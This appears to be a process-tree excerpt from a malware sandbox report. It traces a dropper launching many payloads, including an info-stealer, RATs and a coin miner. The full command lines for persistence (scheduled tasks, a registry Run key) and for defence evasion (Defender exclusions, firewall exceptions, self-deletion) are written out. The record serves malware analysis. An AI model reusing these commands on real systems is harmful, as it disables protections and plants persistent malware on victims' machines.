  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "diskutil" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\diskutil\diskutil.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:26588
- - C:\Users\Admin\Desktop\Files\GoodFrag.exe
    "C:\Users\Admin\Desktop\Files\GoodFrag.exe"
    3⤵
    PID:22352
  - - C:\Users\Admin\AppData\Roaming\Runtime Broker.exe
      "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"
      4⤵
      PID:50928
- - C:\Users\Admin\Desktop\Files\Servers.exe
    "C:\Users\Admin\Desktop\Files\Servers.exe"
    3⤵
    PID:31384
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Server Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:34184
- - C:\Users\Admin\Desktop\Files\TT18.exe
    "C:\Users\Admin\Desktop\Files\TT18.exe"
    3⤵
    PID:32224
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\okN8jxrkz'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:36672

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:724
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5204
- - C:\Users\Admin\Desktop\Files\RuntimeBroker.exe
    "C:\Users\Admin\Desktop\Files\RuntimeBroker.exe"
    3⤵
    PID:7916
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9456
- - C:\Users\Admin\Desktop\Files\nbjekadkthgawd.exe
    "C:\Users\Admin\Desktop\Files\nbjekadkthgawd.exe"
    3⤵
    PID:8348
- - C:\Users\Admin\Desktop\Files\wow.exe
    "C:\Users\Admin\Desktop\Files\wow.exe"
    3⤵
    PID:16020
- - C:\Users\Admin\Desktop\Files\njrtdhadawt.exe
    "C:\Users\Admin\Desktop\Files\njrtdhadawt.exe"
    3⤵
    PID:36636

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5332
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5404
- - C:\Users\Admin\Desktop\Files\inst77player_1.0.0.1.exe
    "C:\Users\Admin\Desktop\Files\inst77player_1.0.0.1.exe"
    3⤵
    PID:32396

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5460
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5720
- - C:\Users\Admin\Desktop\Files\cli.exe
    "C:\Users\Admin\Desktop\Files\cli.exe"
    3⤵
    PID:6616
- - C:\Users\Admin\Desktop\Files\loader.exe
    "C:\Users\Admin\Desktop\Files\loader.exe"
    3⤵
    PID:7716
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:7708
- - C:\Users\Admin\Desktop\Files\system32.exe
    "C:\Users\Admin\Desktop\Files\system32.exe"
    3⤵
    PID:7876
  - - C:\Users\Admin\Desktop\Files\._cache_system32.exe
      "C:\Users\Admin\Desktop\Files\._cache_system32.exe"
      4⤵
      PID:7440
    - - C:\Users\Admin\Desktop\Files\Files\win.exe
        
        "C:\Users\Admin\Desktop\Files\Files\win.exe"
        5⤵
        
        PID:61016
      - C:\Windows\SysWOW64\route.exe
        
        route print
        6⤵
        
        PID:17828
      - C:\Windows\SysWOW64\arp.exe
        
        arp -a 10.127.0.1
        6⤵
        Network Service Discovery
        
        PID:31916
    - - C:\Users\Admin\Desktop\Files\Files\rat.exe
        
        "C:\Users\Admin\Desktop\Files\Files\rat.exe"
        5⤵
        
        PID:41596
      - C:\Users\Admin\Desktop\Files\Files\rat.exe
        
        "C:\Users\Admin\Desktop\Files\Files\rat.exe"
        6⤵
        
        PID:5784
    - - C:\Users\Admin\Desktop\Files\Files\CritScript.exe
        
        "C:\Users\Admin\Desktop\Files\Files\CritScript.exe"
        5⤵
        
        PID:16440
      - C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
        6⤵
        
        PID:33760
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:35404
    - - C:\Users\Admin\Desktop\Files\Files\XClient.exe
        
        "C:\Users\Admin\Desktop\Files\Files\XClient.exe"
        5⤵
        
        PID:7280
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\Files\XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:37792
    - - C:\Users\Admin\Desktop\Files\Files\start.exe
        
        "C:\Users\Admin\Desktop\Files\Files\start.exe"
        5⤵
        
        PID:35768
- - C:\Users\Admin\Desktop\Files\Build.exe
    "C:\Users\Admin\Desktop\Files\Build.exe"
    3⤵
    PID:2960
  - - C:\Users\Admin\AppData\Roaming\AdobeART.exe
      "C:\Users\Admin\AppData\Roaming\AdobeART.exe"
      4⤵
      PID:38252
- - C:\Users\Admin\Desktop\Files\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe
    "C:\Users\Admin\Desktop\Files\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"
    3⤵
    PID:38088
- - C:\Users\Admin\Desktop\Files\kyhjasehs.exe
    "C:\Users\Admin\Desktop\Files\kyhjasehs.exe"
    3⤵
    PID:43108
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1wbydtkq\1wbydtkq.cmdline"
      4⤵
      PID:28416
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8445.tmp" "c:\Users\Admin\Desktop\Files\CSCD7C9569D1A054DE58031C8B052EEB94.TMP"
        5⤵
        
        PID:51612
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n1juoxtx\n1juoxtx.cmdline"
      4⤵
      PID:32412
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD439.tmp" "c:\Users\Public\CSCD7F9323F8D764E0D9487A7D189F85463.TMP"
        5⤵
        
        PID:32592
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\miqyzxzx\miqyzxzx.cmdline"
      4⤵
      PID:36324
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1336.tmp" "c:\ProgramData\Microsoft\CSC7BC5A0E9C2E34EC4873AE24789FDCBB1.TMP"
        5⤵
        
        PID:38384
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nhirs3p2\nhirs3p2.cmdline"
      4⤵
      PID:49904
- - C:\Users\Admin\Desktop\Files\testme.exe
    "C:\Users\Admin\Desktop\Files\testme.exe"
    3⤵
    PID:20016
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\testme.exe" "testme.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:37536

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5748
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5988
- - C:\Users\Admin\Desktop\Files\Documents.exe
    "C:\Users\Admin\Desktop\Files\Documents.exe"
    3⤵
    PID:10152
- - C:\Users\Admin\Desktop\Files\OfferedBuilt.exe
    "C:\Users\Admin\Desktop\Files\OfferedBuilt.exe"
    3⤵
    PID:9564
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy Dominant Dominant.cmd & Dominant.cmd
      4⤵
      PID:54004
- - C:\Users\Admin\Desktop\Files\QGFQTHIU.exe
    "C:\Users\Admin\Desktop\Files\QGFQTHIU.exe"
    3⤵
    PID:38232
  - - C:\Windows\TEMP\{82784DAE-46B5-465D-A200-81D0D0B5F198}\.cr\QGFQTHIU.exe
      "C:\Windows\TEMP\{82784DAE-46B5-465D-A200-81D0D0B5F198}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\Desktop\Files\QGFQTHIU.exe" -burn.filehandle.attached=616 -burn.filehandle.self=612
      4⤵
      PID:44280
    - - C:\Windows\TEMP\{C2260D6B-2181-4136-8D8D-7C2F614C2B86}\.ba\msn.exe
        
        C:\Windows\TEMP\{C2260D6B-2181-4136-8D8D-7C2F614C2B86}\.ba\msn.exe
        5⤵
        
        PID:14180
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14180 -s 588
        6⤵
        Program crash
        
        PID:57000
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14180 -s 608
        6⤵
        Program crash
        
        PID:23744
- - C:\Users\Admin\Desktop\Files\Stub.exe
    "C:\Users\Admin\Desktop\Files\Stub.exe"
    3⤵
    PID:66936
  - - C:\Users\Admin\Desktop\Files\Stub.exe
      "C:\Users\Admin\Desktop\Files\Stub.exe"
      4⤵
      PID:23248
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:30548
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
        5⤵
        
        PID:11312
      - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
        6⤵
        
        PID:37036
- - C:\Users\Admin\Desktop\Files\audi.exe
    "C:\Users\Admin\Desktop\Files\audi.exe"
    3⤵
    PID:36040

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5912
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5352
- - C:\Users\Admin\Desktop\Files\Windows.exe
    "C:\Users\Admin\Desktop\Files\Windows.exe"
    3⤵
    PID:2620
- - C:\Users\Admin\Desktop\Files\AutoHotkeyU64.exe
    "C:\Users\Admin\Desktop\Files\AutoHotkeyU64.exe"
    3⤵
    PID:37828
- - C:\Users\Admin\Desktop\Files\kisteruop.exe
    "C:\Users\Admin\Desktop\Files\kisteruop.exe"
    3⤵
    PID:20064

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5328
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5728
- - C:\Users\Admin\Desktop\Files\svchost.exe
    "C:\Users\Admin\Desktop\Files\svchost.exe"
    3⤵
    PID:58372

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5648
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5164
- - C:\Users\Admin\Desktop\Files\Gorebox%20ModMenu%201.2.0.exe
    "C:\Users\Admin\Desktop\Files\Gorebox%20ModMenu%201.2.0.exe"
    3⤵
    PID:7340
- - C:\Users\Admin\Desktop\Files\RedLineStealer.exe
    "C:\Users\Admin\Desktop\Files\RedLineStealer.exe"
    3⤵
    PID:8680
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:9592
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8680 -s 308
      4⤵
      Program crash
      PID:10068
- - C:\Users\Admin\Desktop\Files\ghdtawedtrgh.exe
    "C:\Users\Admin\Desktop\Files\ghdtawedtrgh.exe"
    3⤵
    PID:8624

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6004
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5448
- - C:\Users\Admin\Desktop\Files\perviy.exe
    "C:\Users\Admin\Desktop\Files\perviy.exe"
    3⤵
    PID:9484
  - - C:\ProgramData\Synaptics\Synaptics.exe
      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
      4⤵
      PID:8544
    - - C:\Users\Admin\Desktop\Files\._cache_Synaptics.exe
        
        "C:\Users\Admin\Desktop\Files\._cache_Synaptics.exe" InjUpdate
        5⤵
        
        PID:48428
- - C:\Users\Admin\Desktop\Files\ew.exe
    "C:\Users\Admin\Desktop\Files\ew.exe"
    3⤵
    PID:32256
- - C:\Users\Admin\Desktop\Files\jhnykawfkth.exe
    "C:\Users\Admin\Desktop\Files\jhnykawfkth.exe"
    3⤵
    PID:25096
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\Files\jhnykawfkth.exe"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:37612
    - - C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:50920
- - C:\Users\Admin\Desktop\Files\fkydjyhjadg.exe
    "C:\Users\Admin\Desktop\Files\fkydjyhjadg.exe"
    3⤵
    PID:20584

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6088
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:5972
- - C:\Users\Admin\Desktop\Files\albt.exe
    "C:\Users\Admin\Desktop\Files\albt.exe"
    3⤵
    PID:8752
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NsltarpnF.cmd" "
      4⤵
      PID:18344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
      4⤵
      PID:16444
  - - C:\Users\Public\Libraries\npratlsN.pif
      C:\Users\Public\Libraries\npratlsN.pif
      4⤵
      PID:12324
- - C:\Users\Admin\Desktop\Files\kthiokadjg.exe
    "C:\Users\Admin\Desktop\Files\kthiokadjg.exe"
    3⤵
    PID:38024
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "NET framework" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\kthiokadjg.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3660
- - C:\Users\Admin\Desktop\Files\winbox.exe
    "C:\Users\Admin\Desktop\Files\winbox.exe"
    3⤵
    PID:18292
- - C:\Users\Admin\Desktop\Files\msedge.exe
    "C:\Users\Admin\Desktop\Files\msedge.exe"
    3⤵
    PID:26404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:39316

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6008
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:4840
- - C:\Users\Admin\Desktop\Files\svhost.exe
    "C:\Users\Admin\Desktop\Files\svhost.exe"
    3⤵
    PID:9612
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9708
- - C:\Users\Admin\Desktop\Files\4.exe
    "C:\Users\Admin\Desktop\Files\4.exe"
    3⤵
    PID:9228
- - C:\Users\Admin\Desktop\Files\XClient.exe
    "C:\Users\Admin\Desktop\Files\XClient.exe"
    3⤵
    PID:10108
  - - C:\Users\Admin\Desktop\Files\._cache_XClient.exe
      "C:\Users\Admin\Desktop\Files\._cache_XClient.exe"
      4⤵
      PID:4232
    - - C:\Users\Admin\Desktop\Files\Files\pyjnkasedf.exe
        
        "C:\Users\Admin\Desktop\Files\Files\pyjnkasedf.exe"
        5⤵
        
        PID:13184
    - - C:\Users\Admin\Desktop\Files\Files\GREENpackage.exe
        
        "C:\Users\Admin\Desktop\Files\Files\GREENpackage.exe"
        5⤵
        
        PID:7384
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
        6⤵
        
        PID:39536
    - - C:\Users\Admin\Desktop\Files\Files\agent.exe
        
        "C:\Users\Admin\Desktop\Files\Files\agent.exe"
        5⤵
        
        PID:3416
    - - C:\Users\Admin\Desktop\Files\Files\installer.exe
        
        "C:\Users\Admin\Desktop\Files\Files\installer.exe"
        5⤵
        
        PID:57616
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Antimalware Core Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:51076
      - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        6⤵
        
        PID:48532
    - - C:\Users\Admin\Desktop\Files\Files\RuntimeBroker.exe
        
        "C:\Users\Admin\Desktop\Files\Files\RuntimeBroker.exe"
        5⤵
        
        PID:36168
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\am1\RuntimeBroker.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:50684
    - - C:\Users\Admin\Desktop\Files\Files\Macro2.exe
        
        "C:\Users\Admin\Desktop\Files\Files\Macro2.exe"
        5⤵
        
        PID:36936
    - - C:\Users\Admin\Desktop\Files\Files\builder.exe
        
        "C:\Users\Admin\Desktop\Files\Files\builder.exe"
        5⤵
        
        PID:37596
- - C:\Users\Admin\Desktop\Files\NdisInstaller3.2.32.1.exe
    "C:\Users\Admin\Desktop\Files\NdisInstaller3.2.32.1.exe"
    3⤵
    PID:8352
- - C:\Users\Admin\Desktop\Files\systempreter.exe
    "C:\Users\Admin\Desktop\Files\systempreter.exe"
    3⤵
    PID:51632
- - C:\Users\Admin\Desktop\Files\World%20of%20Tanks.exe
    "C:\Users\Admin\Desktop\Files\World%20of%20Tanks.exe"
    3⤵
    PID:23364

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6048
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6248
- - C:\Users\Admin\Desktop\Files\ardara.exe
    "C:\Users\Admin\Desktop\Files\ardara.exe"
    3⤵
    PID:7824
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      PID:8388
- - C:\Users\Admin\Desktop\Files\seksiak.exe
    "C:\Users\Admin\Desktop\Files\seksiak.exe"
    3⤵
    PID:8832
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:22324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bEO30gJQmbuI.bat" "
      4⤵
      PID:43684
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:61628
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:30748
- - C:\Users\Admin\Desktop\Files\kg.exe
    "C:\Users\Admin\Desktop\Files\kg.exe"
    3⤵
    PID:21640
- - C:\Users\Admin\Desktop\Files\daytjhasdawd.exe
    "C:\Users\Admin\Desktop\Files\daytjhasdawd.exe"
    3⤵
    PID:41644
- - C:\Users\Admin\Desktop\Files\idrB5Event.exe
    "C:\Users\Admin\Desktop\Files\idrB5Event.exe"
    3⤵
    PID:13188
- - C:\Users\Admin\Desktop\Files\SGVP%20Client%20System.exe
    "C:\Users\Admin\Desktop\Files\SGVP%20Client%20System.exe"
    3⤵
    PID:3600

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:5148
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6372
- - C:\Users\Admin\Desktop\Files\cnct.exe
    "C:\Users\Admin\Desktop\Files\cnct.exe"
    3⤵
    PID:8580
  - - C:\Users\Admin\AppData\Local\Temp\dlscord.exe
      "C:\Users\Admin\AppData\Local\Temp\dlscord.exe"
      4⤵
      PID:34248
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\dlscord.exe" "dlscord.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:36484
- - C:\Users\Admin\Desktop\Files\IMG001.exe
    "C:\Users\Admin\Desktop\Files\IMG001.exe"
    3⤵
    PID:37968
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
      4⤵
      PID:62400
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        5⤵
        Kills process with taskkill
        
        PID:26432
  - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
      "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
      4⤵
      PID:46532
  - - C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
      "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
      4⤵
      PID:25608
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe
        5⤵
        
        PID:54968
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im tftp.exe
        6⤵
        Kills process with taskkill
        
        PID:25812
    - - C:\Users\Admin\AppData\Local\Temp\tftp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tftp.exe"
        5⤵
        
        PID:28488
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        5⤵
        
        PID:32992
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
        6⤵
        
        PID:33624
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        
        PID:33784
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:37248
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        5⤵
        
        PID:34708
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:34288
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        5⤵
        Power Settings
        
        PID:1648
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:36128
      - C:\Windows\SysWOW64\powercfg.exe
        
        powercfg /CHANGE -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:37088
      - C:\Windows\SysWOW64\powercfg.exe
        
        Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
        6⤵
        Power Settings
        
        PID:49996
- - C:\Users\Admin\Desktop\Files\workout.exe
    "C:\Users\Admin\Desktop\Files\workout.exe"
    3⤵
    PID:41840
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:32064
- - C:\Users\Admin\Desktop\Files\vncgroups.exe
    "C:\Users\Admin\Desktop\Files\vncgroups.exe"
    3⤵
    PID:23608
  - - C:\ProgramData\idmans\idmans.exe
      "C:\ProgramData\idmans\idmans.exe"
      4⤵
      PID:33572
- - C:\Users\Admin\Desktop\Files\enai2.exe
    "C:\Users\Admin\Desktop\Files\enai2.exe"
    3⤵
    PID:52732

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:6224
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:6520
- - C:\Users\Admin\Desktop\Files\vorpgkadeg.exe
    "C:\Users\Admin\Desktop\Files\vorpgkadeg.exe"
    3⤵
    PID:7544
- - C:\Users\Admin\Desktop\Files\windowshost.exe
    "C:\Users\Admin\Desktop\Files\windowshost.exe"
    3⤵
    PID:7852
- - C:\Users\Admin\Desktop\Files\GREENpackage.exe
    "C:\Users\Admin\Desktop\Files\GREENpackage.exe"
    3⤵
    PID:8144
